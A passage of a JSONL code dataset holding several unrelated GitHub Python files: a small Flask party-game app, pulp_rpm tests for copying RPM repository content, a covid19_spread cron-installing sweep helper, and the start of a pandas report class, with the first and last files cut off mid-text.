json.loads(cont)\n if qry_count_date(engine, data, tag) > 0:\n skip_existing = skip_existing + 1\n else:\n insert_rec(engine, data, tag=tag)\n inserted = inserted + 1\n except Exception as ex:\n print(\"error\", fe, ex, file=sys.stderr)\n\n # delete_all(engine,recs)\n\n print(\"skip_existing\", skip_existing)\n print(\"inserted\", inserted)\n\n print(\"all tag\", tag, qry_count_all(engine, tag=tag, exclude_tag=False))\n print(\"all\", qry_count_all(engine, tag=tag, exclude_tag=True))\n\n # dialect+driver://username:password@host:port/database\n\n\nif __name__ == \"__main__\":\n main_func()\n","repo_name":"kr-g/tempres","sub_path":"tempres/maindb.py","file_name":"maindb.py","file_ext":"py","file_size_in_byte":8664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29863810601","text":"import flask\r\nimport random\r\nfrom flask import render_template\r\nfrom flask import request\r\n\r\napp = flask.Flask(__name__)\r\nplayers = ['highonmelatonin', 'SomeNickname', 'GeneralKen0bi','lowondopamine','highoncortisol']\r\n\r\nHOST = '127.0.0.1'\r\nPORT = 5000\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n\r\n@app.route('/lobby', methods = ['POST'])\r\ndef lobby():\r\n player = request.form.get(\"player\")\r\n code = 8888\r\n return render_template('lobby.html', code = code, players = players)\r\n\r\n\r\n@app.route('/join/', methods = ['POST'])\r\ndef join():\r\n return render_template('player.html')\r\n\r\n\r\n@app.route('/setup/', methods = ['POST'])\r\ndef setup():\r\n number = request.form.get(\"number\")\r\n number = int(number)\r\n number = 1\r\n return render_template('setup.html', players = players, number = number)\r\n\r\n\r\n@app.route('/game/', methods = ['POST'])\r\ndef game():\r\n question = request.form.get(\"question\")\r\n selected = request.form.get(\"selected\")\r\n return render_template('game.html', players = players, question = question)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)\r\n","repo_name":"HighOnMelatonin/burningbridges","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12186666526","text":"\"\"\"Tests that sync rpm plugin repositories.\"\"\"\nimport pytest\n\nfrom pulp_smash.pulp3.utils import (\n get_added_content_summary,\n get_content_summary,\n)\n\nfrom pulp_rpm.tests.functional.constants import (\n PULP_TYPE_PACKAGE,\n RPM_FIXTURE_SUMMARY,\n RPM_KICKSTART_FIXTURE_SUMMARY,\n RPM_MODULAR_FIXTURE_URL,\n RPM_MODULAR_STATIC_FIXTURE_SUMMARY,\n RPM_MODULES_STATIC_CONTEXT_FIXTURE_URL,\n)\n\nfrom pulpcore.client.pulp_rpm import Copy\nfrom pulpcore.client.pulp_rpm.exceptions import ApiException\n\n\n@pytest.mark.parallel\ndef test_modular_static_context_copy(\n init_and_sync,\n monitor_task,\n rpm_copy_api,\n rpm_modulemd_api,\n rpm_repository_factory,\n rpm_repository_api,\n):\n \"\"\"Test copying a static_context-using repo to an empty destination.\"\"\"\n src, _ = init_and_sync(url=RPM_MODULES_STATIC_CONTEXT_FIXTURE_URL)\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[{\"source_repo_version\": src.latest_version_href, \"dest_repo\": dest.pulp_href}],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n # Check that we have the correct content counts.\n dest = rpm_repository_api.read(dest.pulp_href)\n assert get_content_summary(dest.to_dict()) == RPM_MODULAR_STATIC_FIXTURE_SUMMARY\n assert get_added_content_summary(dest.to_dict()) == RPM_MODULAR_STATIC_FIXTURE_SUMMARY\n\n modules = rpm_modulemd_api.list(repository_version=dest.latest_version_href).results\n module_static_contexts = [\n (module.name, module.version) for module in modules if module.static_context\n ]\n assert len(module_static_contexts) == 2\n\n\nclass TestCopyWithUnsignedRepoSyncedImmediate:\n def test_basic_copy_all(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_repository_factory,\n rpm_repository_api,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copying all the content from one repo to another.\"\"\"\n src = rpm_unsigned_repo_immediate\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[{\"source_repo_version\": src.latest_version_href, \"dest_repo\": dest.pulp_href}],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n # Check that we have the correct content counts.\n dest = rpm_repository_api.read(dest.pulp_href)\n assert get_content_summary(dest.to_dict()) == RPM_FIXTURE_SUMMARY\n assert get_added_content_summary(dest.to_dict()) == RPM_FIXTURE_SUMMARY\n\n def test_copy_none(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copying NO CONTENT from one repo to another.\"\"\"\n src = rpm_unsigned_repo_immediate\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n \"content\": [],\n }\n ],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n dest = rpm_repository_api.read(dest.pulp_href)\n # Check that no new repo-version was created in dest_repo\n assert \"{}versions/0/\".format(dest.pulp_href) == dest.latest_version_href\n\n def test_invalid_config(\n self,\n rpm_copy_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test invalid config.\"\"\"\n src = rpm_unsigned_repo_immediate\n dest = rpm_repository_factory()\n\n with pytest.raises(ApiException):\n # no list\n data = Copy(\n config={\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n },\n dependency_solving=False,\n )\n rpm_copy_api.copy_content(data)\n\n with pytest.raises(ApiException):\n good = {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n }\n bad = {\"source_repo_version\": src.latest_version_href}\n data = Copy(config=[good, bad], dependency_solving=False)\n rpm_copy_api.copy_content(data)\n\n with pytest.raises(ApiException):\n data = Copy(\n config=[{\"source_repo\": src.latest_version_href, \"dest_repo\": dest.pulp_href}],\n dependency_solving=False,\n )\n rpm_copy_api.copy_content(data)\n\n def test_content(\n self,\n monitor_task,\n rpm_advisory_api,\n rpm_copy_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test the content parameter.\"\"\"\n src = rpm_unsigned_repo_immediate\n\n content = rpm_advisory_api.list(repository_version=src.latest_version_href).results\n content_to_copy = (content[0].pulp_href, content[1].pulp_href)\n\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n \"content\": content_to_copy,\n }\n ],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n dest = rpm_repository_api.read(dest.pulp_href)\n dc = rpm_advisory_api.list(repository_version=dest.latest_version_href)\n dest_content = [c.pulp_href for c in dc.results]\n\n assert sorted(content_to_copy) == sorted(dest_content)\n\n def test_all_content_recursive(\n self,\n monitor_task,\n rpm_advisory_api,\n rpm_copy_api,\n rpm_package_api,\n rpm_repository_factory,\n rpm_repository_api,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test requesting all-rpm-update-content/recursive (see #6519).\"\"\"\n src = rpm_unsigned_repo_immediate\n dest = rpm_repository_factory()\n\n advisory_content = rpm_advisory_api.list(repository_version=src.latest_version_href)\n advisories_to_copy = [rslt.pulp_href for rslt in advisory_content.results]\n\n rpm_content = rpm_package_api.list(repository_version=src.latest_version_href)\n rpms_to_copy = [rslt.pulp_href for rslt in rpm_content.results]\n\n content_to_copy = set()\n content_to_copy.update(advisories_to_copy)\n content_to_copy.update(rpms_to_copy)\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n \"content\": list(content_to_copy),\n }\n ],\n dependency_solving=True,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n dest = rpm_repository_api.read(dest.pulp_href)\n\n # check advisories copied\n dc = rpm_advisory_api.list(repository_version=dest.latest_version_href)\n dest_content = [c.pulp_href for c in dc.results]\n assert sorted(advisories_to_copy) == sorted(dest_content)\n\n # check rpms copied\n dc = rpm_package_api.list(repository_version=dest.latest_version_href)\n dest_content = [c.pulp_href for c in dc.results]\n assert sorted(rpms_to_copy) == sorted(dest_content)\n\n def test_strict_copy_package_to_empty_repo(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_package_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copy package and its dependencies to empty repository.\n\n - Create repository and populate it\n - Create empty repository\n - Use 'copy' to copy 'whale' package with dependencies\n - assert package and its dependencies were copied\n \"\"\"\n empty_repo = rpm_repository_factory()\n repo = rpm_unsigned_repo_immediate\n\n packages = rpm_package_api.list(repository_version=repo.latest_version_href, name=\"whale\")\n package_to_copy = [packages.results[0].pulp_href]\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": empty_repo.pulp_href,\n \"content\": package_to_copy,\n }\n ],\n dependency_solving=True,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n empty_repo = rpm_repository_api.read(empty_repo.pulp_href)\n packages = rpm_package_api.list(repository_version=empty_repo.latest_version_href).results\n packages = [package.name for package in packages]\n\n # assert that only 3 packages are copied (original package with its two dependencies)\n assert len(packages) == 3\n # assert dependencies package names\n for dependency in [\"shark\", \"stork\"]:\n assert dependency in packages\n\n def test_strict_copy_packagecategory_to_empty_repo(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_package_api,\n rpm_package_category_api,\n rpm_package_groups_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copy package and its dependencies to empty repository.\n\n - Create repository and populate it\n - Create empty destination repository\n - Use 'copy' to copy packagecategory recursively\n - assert packagecategory and its dependencies were copied\n \"\"\"\n dest_repo = rpm_repository_factory()\n repo = rpm_unsigned_repo_immediate\n\n package_categories = rpm_package_category_api.list(\n repository_version=repo.latest_version_href\n )\n package_category_to_copy = [package_categories.results[0].pulp_href]\n # repository content counts\n repo_packagecategories_count = package_categories.count\n repo_packagegroups_count = rpm_package_groups_api.list(\n repository_version=repo.latest_version_href\n ).count\n\n # do the copy\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": dest_repo.pulp_href,\n \"content\": package_category_to_copy,\n }\n ],\n dependency_solving=True,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n # copied repository content counts\n dest_repo = rpm_repository_api.read(dest_repo.pulp_href)\n dest_repo_packages = rpm_package_api.list(repository_version=dest_repo.latest_version_href)\n dest_repo_packages_count = dest_repo_packages.count\n dest_repo_packagecategories_count = rpm_package_category_api.list(\n repository_version=dest_repo.latest_version_href\n ).count\n dest_repo_packagegroups_count = rpm_package_groups_api.list(\n repository_version=dest_repo.latest_version_href\n ).count\n\n # assert that all dependencies were copied\n assert repo_packagecategories_count == dest_repo_packagecategories_count\n assert repo_packagegroups_count == dest_repo_packagegroups_count\n # Not all packages in repository are dependecies,\n # only packagegroups packages and its dependencies\n assert dest_repo_packages_count == 30\n # Assert only one latest version of 'duck' pacakge was copied\n copied_duck_pkg = [\n duck_pkg.version for duck_pkg in dest_repo_packages.results if duck_pkg.name == \"duck\"\n ]\n assert copied_duck_pkg == [\"0.8\"]\n\n def test_strict_copy_package_to_existing_repo(\n self,\n init_and_sync,\n monitor_task,\n rpm_copy_api,\n rpm_package_api,\n rpm_repository_api,\n rpm_repository_version_api,\n rpm_unsigned_repo_immediate,\n ):\n \"\"\"Test copy package and its dependencies to empty repository.\n\n - Create repository and populate it\n - Create second repository with package fulfilling test package dependency\n - Use 'copy' to copy 'whale' package with dependencies\n - assert package and its missing dependencies were copied\n \"\"\"\n # prepare final_repo - copy to repository\n final_repo, _ = init_and_sync()\n\n # prepare repository - copy from repository\n repo = rpm_unsigned_repo_immediate\n\n # remove test package and one dependency package from final repository\n data = {\n \"remove_content_units\": [\n pkg.pulp_href\n for pkg in rpm_package_api.list(\n repository_version=final_repo.latest_version_href\n ).results\n if pkg.name in (\"shark\", \"whale\")\n ]\n }\n monitor_task(rpm_repository_api.modify(final_repo.pulp_href, data).task)\n\n final_repo = rpm_repository_api.read(final_repo.pulp_href)\n\n # get package to copy\n packages = rpm_package_api.list(repository_version=repo.latest_version_href, name=\"whale\")\n package_to_copy = [packages.results[0].pulp_href]\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": final_repo.pulp_href,\n \"content\": package_to_copy,\n }\n ],\n dependency_solving=True,\n )\n copy_response = monitor_task(rpm_copy_api.copy_content(data).task)\n repository_version = rpm_repository_version_api.read(copy_response.created_resources[0])\n\n # check only two packages was copied, original package to copy and only one\n # of its dependency as one is already present\n content_summary = repository_version.to_dict()[\"content_summary\"]\n assert content_summary[\"added\"][PULP_TYPE_PACKAGE][\"count\"] == 2\n\n\nclass TestCopyWithKickstartRepoSyncedImmediate:\n def test_kickstart_content(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_content_distribution_trees_api,\n rpm_kickstart_repo_immediate,\n rpm_repository_api,\n rpm_repository_factory,\n ):\n \"\"\"Test the content parameter.\"\"\"\n src = rpm_kickstart_repo_immediate\n dest = rpm_repository_factory()\n\n content = rpm_content_distribution_trees_api.list(\n repository_version=src.latest_version_href\n )\n content_to_copy = [content.results[0].pulp_href]\n data = Copy(\n config=[\n {\n \"source_repo_version\": src.latest_version_href,\n \"dest_repo\": dest.pulp_href,\n \"content\": content_to_copy,\n }\n ],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n dest = rpm_repository_api.read(dest.pulp_href)\n content = rpm_content_distribution_trees_api.list(\n repository_version=dest.latest_version_href\n )\n dest_content = [c.pulp_href for c in content.results]\n\n assert content_to_copy == dest_content\n\n def test_kickstart_copy_all(\n self,\n monitor_task,\n rpm_copy_api,\n rpm_kickstart_repo_immediate,\n rpm_repository_api,\n rpm_repository_factory,\n ):\n \"\"\"Test copying all the content from one repo to another.\"\"\"\n src = rpm_kickstart_repo_immediate\n dest = rpm_repository_factory()\n\n data = Copy(\n config=[{\"source_repo_version\": src.latest_version_href, \"dest_repo\": dest.pulp_href}],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n # Check that we have the correct content counts.\n dest = rpm_repository_api.read(dest.pulp_href)\n assert get_content_summary(dest.to_dict()) == RPM_KICKSTART_FIXTURE_SUMMARY\n assert get_added_content_summary(dest.to_dict()) == RPM_KICKSTART_FIXTURE_SUMMARY\n\n\ndef test_strict_copy_module_to_empty_repo(\n monitor_task,\n rpm_copy_api,\n rpm_modulemd_api,\n rpm_repository_api,\n rpm_repository_factory,\n rpm_modular_repo_on_demand,\n):\n \"\"\"Test copy module and its dependencies to empty repository.\n\n - Create repository and populate it\n - Create empty repository\n - Use 'copy' to copy 'nodejs' module with dependencies\n - assert module and its dependencies and relevant artifacts were copied\n \"\"\"\n empty_repo = rpm_repository_factory()\n repo = rpm_modular_repo_on_demand\n\n modules = rpm_modulemd_api.list(\n repository_version=repo.latest_version_href,\n name=\"nodejs\",\n stream=\"11\",\n version=\"20180920144611\",\n )\n module_to_copy = [modules.results[0].pulp_href]\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": empty_repo.pulp_href,\n \"content\": module_to_copy,\n }\n ],\n dependency_solving=True,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n empty_repo = rpm_repository_api.read(empty_repo.pulp_href)\n modules = rpm_modulemd_api.list(repository_version=empty_repo.latest_version_href).results\n module_names = [module.name for module in modules]\n\n # assert that only 3 modules are copied (original and one dependency)\n assert len(modules) == 2\n # assert dependencies package names\n for dependency in [\"nodejs\", \"postgresql\"]:\n assert dependency in module_names\n\n\n@pytest.mark.parallel\ndef test_advisory_copy_child_detection(\n init_and_sync,\n monitor_task,\n rpm_advisory_api,\n rpm_copy_api,\n rpm_modulemd_api,\n rpm_package_api,\n rpm_repository_api,\n rpm_repository_factory,\n):\n \"\"\"Test copy advisory and its direct package & module dependencies to empty repository.\n\n No recursive dependencies.\n\n - Create repository and populate it\n - Create empty repository\n - Use 'copy' to copy an advisory\n - assert advisory and its dependencies were copied\n \"\"\"\n empty_repo = rpm_repository_factory()\n repo, _ = init_and_sync(url=RPM_MODULAR_FIXTURE_URL)\n\n test_advisory_href = get_all_content_hrefs(\n rpm_advisory_api, repository_version=repo.latest_version_href, id=\"FEDORA-2019-0329090518\"\n )[0]\n content_to_copy = [test_advisory_href]\n\n data = Copy(\n config=[\n {\n \"source_repo_version\": repo.latest_version_href,\n \"dest_repo\": empty_repo.pulp_href,\n \"content\": content_to_copy,\n }\n ],\n dependency_solving=False,\n )\n monitor_task(rpm_copy_api.copy_content(data).task)\n\n empty_repo = rpm_repository_api.read(empty_repo.pulp_href)\n\n empty_repo_packages = [\n pkg.name\n for pkg in rpm_package_api.list(repository_version=empty_repo.latest_version_href).results\n ]\n empty_repo_advisories = [\n advisory.id\n for advisory in rpm_advisory_api.list(\n repository_version=empty_repo.latest_version_href\n ).results\n ]\n empty_repo_modules = [\n module.name\n for module in rpm_modulemd_api.list(\n repository_version=empty_repo.latest_version_href\n ).results\n ]\n\n # check the specific advisory was copied\n assert len(empty_repo_advisories) == 1\n # assert that all dependant packages were copied, the direct children of the advisory\n assert len(empty_repo_packages) == 2\n # assert dependencies package names\n for dependency in [\"postgresql\", \"nodejs\"]:\n assert dependency in empty_repo_packages\n assert dependency in empty_repo_modules\n\n\ndef get_all_content_hrefs(api, **kwargs):\n \"\"\"Fetch all the content using the provided content API and query params.\n\n De-paginates the results.\n \"\"\"\n content_list = []\n\n while True:\n content = api.list(**kwargs, offset=len(content_list))\n page = content.results\n content_list.extend([content.pulp_href for content in page])\n if not content.next:\n break\n\n return content_list\n","repo_name":"pulp/pulp_rpm","sub_path":"pulp_rpm/tests/functional/api/test_copy.py","file_name":"test_copy.py","file_ext":"py","file_size_in_byte":20444,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"37"} +{"seq_id":"70115773868","text":"import sys\nimport os\n\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../\"))\nimport cv\nimport tempfile\nfrom subprocess import check_call, check_output\nimport sqlite3\nimport click\nimport datetime\nfrom covid19_spread.lib.context_managers import chdir\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nDB = os.path.join(script_dir, \".sweep.db\")\n\n\ndef mk_db():\n if not os.path.exists(DB):\n conn = sqlite3.connect(DB)\n conn.execute(\n \"\"\"\n CREATE TABLE sweeps(\n path text primary key,\n basedate text NOT NULL,\n launch_time real NOT NULL,\n module text NOT NULL,\n slurm_job text,\n id text\n );\n \"\"\"\n )\n conn.execute(\n \"\"\"\n CREATE TABLE submitted(\n sweep_path text UNIQUE,\n submitted_at real NOT NULL,\n FOREIGN KEY(sweep_path) REFERENCES sweeps(path)\n );\n \"\"\"\n )\n\n\nclass Recurring:\n script_dir = script_dir\n\n def __init__(self, force=False):\n self.force = force\n mk_db()\n\n def get_id(self) -> str:\n \"\"\"Return a unique ID to be used in the database\"\"\"\n raise NotImplementedError\n\n def update_data(self) -> None:\n \"\"\"Fetch new data (should be idempotent)\"\"\"\n raise NotImplementedError\n\n def command(self) -> str:\n \"\"\"The command to run in cron\"\"\"\n raise NotImplementedError\n\n def latest_date(self) -> datetime.date:\n \"\"\"\"Return the latest date that we have data for\"\"\"\n raise NotImplementedError\n\n def module(self):\n \"\"\"CV module to run\"\"\"\n return \"mhp\"\n\n def schedule(self) -> str:\n \"\"\"Cron schedule\"\"\"\n return \"*/5 * * * *\" # run every 5 minutes\n\n def install(self) -> None:\n \"\"\"Method to install cron job\"\"\"\n crontab = check_output([\"crontab\", \"-l\"]).decode(\"utf-8\")\n marker = f\"__JOB_{self.get_id()}__\"\n if marker in crontab:\n raise ValueError(\n \"Cron job already installed, cleanup crontab\"\n \" with `crontab -e` before installing again\"\n )\n envs = (\n check_output([\"conda\", \"env\", \"list\"]).decode(\"utf-8\").strip().split(\"\\n\")\n )\n active = [e for e in envs if \"*\" in e]\n conda_env = None\n if len(active) == 1:\n conda_env = f\"source activate {active[0].split()[0]}\"\n\n with tempfile.NamedTemporaryFile() as tfile:\n with open(tfile.name, \"w\") as fout:\n print(crontab, file=fout)\n print(f\"# {marker}\", file=fout)\n user = os.environ[\"USER\"]\n script = os.path.realpath(__file__)\n schedule = self.schedule()\n stdoutfile = os.path.join(self.script_dir, f\".{self.get_id()}.log\")\n stderrfile = os.path.join(self.script_dir, f\".{self.get_id()}.err\")\n home = os.path.expanduser(\"~\")\n cmd = [\n \"source /etc/profile.d/modules.sh\",\n f\"source {home}/.profile\",\n f\"source {home}/.bash_profile\",\n f\"source {home}/.bashrc\",\n conda_env,\n \"slack-on-fail \" + self.command(),\n ]\n cmd = [c for c in cmd if c is not None]\n subject = f\"ERROR in recurring sweep: {self.get_id()}\"\n envs = [\n f'PATH=\"/usr/local/bin:/private/home/{user}/bin:/usr/sbin:$PATH\"',\n \"__PROD__=1\",\n f\"USER={user}\",\n ]\n print(\n f'{schedule} {\" \".join(envs)} bash -c \"{\" && \".join(cmd)} >> {stdoutfile} 2>> {stderrfile}\"',\n file=fout,\n )\n check_call([\"crontab\", tfile.name])\n\n def refresh(self) -> None:\n \"\"\"Check for new data, schedule a job if new data is found\"\"\"\n self.update_data()\n latest_date = self.latest_date()\n conn = sqlite3.connect(DB)\n res = conn.execute(\n \"SELECT path, launch_time FROM sweeps WHERE basedate=? AND id=?\",\n (str(latest_date), self.get_id()),\n )\n if not self.force:\n for pth, launch_time in res:\n launch_time = datetime.datetime.fromtimestamp(launch_time)\n if os.path.exists(pth):\n\n print(f\"Already launched {pth} at {launch_time}, exiting...\")\n return\n # This directory got deleted, remove it from the database...\n conn.execute(\n \"DELETE FROM sweeps WHERE path=? AND id=?\", (pth, self.get_id())\n )\n conn.commit()\n\n sweep_path = self.launch_job()\n\n vals = (\n sweep_path,\n str(latest_date),\n datetime.datetime.now().timestamp(),\n self.module(),\n self.get_id(),\n )\n conn.execute(\n \"INSERT INTO sweeps(path, basedate, launch_time, module, id) VALUES (?,?,?,?,?)\",\n vals,\n )\n conn.commit()\n\n def launch_job(self, **kwargs):\n \"\"\"Launch the sweep job\"\"\"\n # Launch the sweep\n config = os.path.join(script_dir, f\"../../cv/{kwargs.get('cv_config')}.yml\")\n with chdir(f\"{script_dir}/../../\"):\n sweep_path, jobs = click.Context(cv.cv).invoke(\n cv.cv,\n config_pth=config,\n module=kwargs.get(\"module\", \"bar\"),\n remote=True,\n array_parallelism=kwargs.get(\"array_parallelism\", 20),\n )\n return sweep_path\n","repo_name":"facebookresearch/covid19_spread","sub_path":"covid19_spread/data/recurring.py","file_name":"recurring.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"32476435441","text":"import pandas as pd\nimport plotly.express as px\nfrom datetime import datetime, timedelta\nfrom data import var_f11, var_global\nfrom general import set_columns_nunique, set_columns_sum, make_tables, set_antiguedad\n\nclass F11():\n \n # Constants\n dt_string = datetime.now().strftime('%y%m%d')\n mes = ['Jan-21','Feb-21','Mar-21','Apr-21','May-21','Jun-21','Jul-21','Aug-21','Sep-21','Oct-21','Nov-21','Dec-21', 'Jan-22', 'Feb-22', 'Mar-22', 'Apr-22', 'May-22','Jun-22','Jul-22'] # Editar esta lista cada vez \n rango_fechas = []\n f11_tcosto = None\n f11_tm90_costo = None\n f11_tcant = None\n f11_tm90_cant = None \n\n def __init__(self, frango, fcorte, f11_name) -> None:\n self.fcorte = fcorte\n self.rango_fechas = frango\n self.f11 = pd.read_csv(var_f11['path_df'] + f11_name + '.csv', dtype='object', sep=';')\n self.path = f\"{var_global['path_cortes']}/{fcorte}_corte/images/f11\"\n self.transform()\n self.f11 = self.f11.sort_values(var_f11['fech_creacion'])\n self.f11 = set_antiguedad(self.f11, 'DIAS', 'f11')\n self.f11_rf = self.f11_filters() # F11 con todos los filtros iniciales\n self.f11_m90 = self.fltr_riesgo(self.f11_rf) # F11 empresa abiertos mayores a 90 días de creados\n self.print_numbers()\n\n def get_max_trend_date(self):\n self.load_trend_files()\n return pd.to_datetime(self.f11_tcosto[var_f11['fecha_corte']], format='%Y-%m-%d').max()\n\n def get_f11(self):\n return self.f11_rf\n\n def get_f11_m90(self):\n return self.f11_m90\n\n def get_path(self):\n return self.path\n\n ## ------ Trasform \n def transform(self):\n print('Transformando valores...')\n # Dates \n self.f11[var_f11['fech_creacion']] = pd.to_datetime(self.f11[var_f11['fech_creacion']], format='%Y-%m-%d')\n self.f11[var_f11['mes']] = self.f11[var_f11['fech_creacion']].dt.strftime('%b-%y')\n # Numbers \n self.f11[var_f11['costo']] = pd.to_numeric(self.f11[var_f11['costo']])\n self.f11[var_f11['dias']]= pd.to_numeric(self.f11[var_f11['dias']])\n # Text\n\n ## ------ Filters\n def f11_filters(self):\n print(\"Generando filtros...\")\n f11_initial = fltr_fecha_desde(self.f11)\n f11_empresa = fltr_empresa(f11_initial)\n f11_st_rf12 = fltr_tipo_f11(f11_empresa)\n f11_emp_abiertos = fltr_abiertos(f11_st_rf12)\n return f11_emp_abiertos\n\n def fltr_riesgo(self, df):\n return df.loc[df['DIAS'] >90]\n\n def load_trend_files(self):\n self.f11_tcosto = pd.read_excel(var_f11['trend_path'], sheet_name='f11_abiertos_costo')\n self.f11_tm90_costo = pd.read_excel(var_f11['trend_path'], sheet_name='f11_abiertos_m90_costo')\n self.f11_tcant = pd.read_excel(var_f11['trend_path'], sheet_name='f11_abiertos_cant')\n self.f11_tm90_cant = pd.read_excel(var_f11['trend_path'], sheet_name='f11_abiertos_m90_cant')\n\n def get_f11_cutoff(self):\n print('Generando agrupaciones ... ')\n gb_f11_gm = self.f11_rf.groupby([var_f11['grupo'], var_f11['mes']], sort=False)[var_f11['costo']].sum().reset_index()\n gb_f11_gm_m90 = self.f11_m90.groupby([var_f11['grupo'], var_f11['mes']])[var_f11['costo']].sum().reset_index()\n gb_f11_gm_cant = self.f11_rf.groupby([var_f11['grupo'], var_f11['mes']], sort=False)[var_f11['f11_id']].nunique().reset_index()\n gb_f11_gm_m90_cant = self.f11_m90.groupby([var_f11['grupo'], var_f11['mes']])[var_f11['f11_id']].nunique().reset_index()\n\n print('Estableciendo nueva fecha de corte ... ')\n gb_f11_gm = set_fecha_corte(gb_f11_gm)\n gb_f11_gm_m90 = set_fecha_corte(gb_f11_gm_m90)\n gb_f11_gm_cant = set_fecha_corte(gb_f11_gm_cant)\n gb_f11_gm_m90_cant = set_fecha_corte(gb_f11_gm_m90_cant)\n\n print('Concatenando corte a histórico ...')\n self.f11_tcosto = pd.concat([self.f11_tcosto, gb_f11_gm], axis=0)\n self.f11_tm90_costo = pd.concat([self.f11_tm90_costo, gb_f11_gm_m90], axis=0)\n self.f11_tcant = pd.concat([self.f11_tcant, gb_f11_gm_cant], axis=0)\n self.f11_tm90_cant = pd.concat([self.f11_tm90_cant, gb_f11_gm_m90_cant], axis=0)\n\n print('Transformando datos ... ')\n # Transform \n self.f11_tcosto = transform_df_trend(self.f11_tcosto, var_f11['costo'])\n self.f11_tm90_costo = transform_df_trend(self.f11_tm90_costo, var_f11['costo'])\n self.f11_tcant = transform_df_trend(self.f11_tcant, var_f11['f11_id'])\n self.f11_tm90_cant = transform_df_trend(self.f11_tm90_cant, var_f11['f11_id'])\n\n print('Guardando análisis del corte!')\n writer = pd.ExcelWriter(var_f11['trend_path'], engine='xlsxwriter')\n self.f11_tcosto.to_excel(writer, sheet_name='f11_abiertos_costo', index=False)\n self.f11_tm90_costo.to_excel(writer, sheet_name='f11_abiertos_m90_costo', index=False)\n self.f11_tcant.to_excel(writer, sheet_name='f11_abiertos_cant', index=False)\n self.f11_tm90_cant.to_excel(writer, sheet_name='f11_abiertos_m90_cant', index=False)\n writer.save()\n print('Hecho!')\n\n def tendencias(self):\n self.load_trend_files()\n self.get_tendencias_costo()\n self.get_tendencias_cantidad()\n\n def print_numbers(self):\n \n print(f'Propietario de f11: {self.f11_rf[var_f11[\"propietario\"]].unique()}')\n print(f'Tipos de F11 encontrados: {self.f11_rf[var_f11[\"servicio\"]].unique()}')\n print(f'Estados de F11 encontrados: {self.f11_rf[var_f11[\"estado\"]].unique()}')\n print(self.f11_rf.groupby([var_f11['grupo']], sort=False)[var_f11['costo']].sum().sort_values(ascending=False))\n\n def f11_resfil(self):\n # Gráfica para costo\n gb_f11_gm = self.f11_rf.groupby([var_f11['grupo'], var_f11['mes']], sort=False)[var_f11['costo']].sum().reset_index() # TODO repetido \n gb_f11_gm = set_columns_sum(gb_f11_gm, var_f11['mes'],var_f11['costo'])\n gb_f11_gm = set_columns_sum(gb_f11_gm, var_f11['grupo'],var_f11['costo'])\n orden_grupo = gb_f11_gm.groupby([var_f11['grupo']], sort=False)[var_f11['costo']].sum().sort_values(ascending=False).reset_index()[var_f11['grupo']].to_list()\n orden_mes = gb_f11_gm[var_f11['mes']].unique().tolist()\n total_abierto = gb_f11_gm[var_f11['costo']].sum()\n gb_f11_3m_grupo = self.f11_m90.groupby(var_f11['grupo'])[var_f11['costo']].sum().reset_index().set_index(var_f11['grupo']) # Calcula los totales de costo por grupo \n self.fig_f11_costo(gb_f11_gm, gb_f11_3m_grupo, orden_grupo, 